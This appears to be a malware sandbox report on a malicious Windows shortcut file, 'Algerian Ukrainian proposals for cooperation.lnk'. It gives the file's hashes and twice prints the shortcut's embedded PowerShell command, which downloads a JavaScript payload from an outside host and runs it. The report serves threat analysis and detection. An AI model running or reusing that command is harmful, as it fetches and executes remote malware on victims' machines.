General
Structural Analysis
Config.0
Yara Rules1
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
|
Hash | Hash Value |
|---|---|
| MD5 | db5a302fa7255a3b88873e7979555f32
|
| Sha1 | b14b6e374e04af4ec98f003cae40b5ee6c42913f
|
| Sha256 | 2671e1f43b2e5911310c5b3f124c076055eec5dee4e596854332ffcf791fd740
|
| Sha384 | 2de279e35e1a4c731d1d942ea092c4c514be5e726623d16d85c3fa6ed49cbfe4c6656de8990d0a13a3e28c7ee50b5b12
|
| Sha512 | d8467a3d66f01c0d7ca9acf20813f188373cde5fd77fc32ed1e1dfd62594ce561d8e8c3fa4ad5784697723082cc1b5cd4b0a3c4b0dcaa5ddc0f43b92fc53e649
|
| SSDeep | 24:8hwWa5y5LEnXKPiW2lxAtWF+/CWw+//fIP24I0aho+Z5:8HVZEMfCnPJI0+
|
| TLSH | E4219D1422F10718D7B24EB9BCBAE3218633F825EE52878D1290A2854874224E53BF2B
|
File Structure
Algerian Ukrainian proposals for cooperation.lnk
Malicious
[Lnk Summary]
Malicious
Artefacts
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe "cd $ENV:Temp;$f=$ENV:Temp+'\f.js';Invoke-WebRequest 'https://filebulldogs.com/uploads/82WX5GP8CI/f.js' -OutFile $f;./f.js;" |
Algerian Ukrainian proposals for cooperation.lnk (1.37 KB)
File Structure
Algerian Ukrainian proposals for cooperation.lnk
Malicious
[Lnk Summary]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe "cd $ENV:Temp;$f=$ENV:Temp+'\f.js';Invoke-WebRequest 'https://filebulldogs.com/uploads/82WX5GP8CI/f.js' -OutFile $f;./f.js;" Malicious |
Algerian Ukrainian proposals for cooperation.lnk |
You must be signed in to post a comment.
You need a premium account to access this feature.
You must be signed in to post a comment.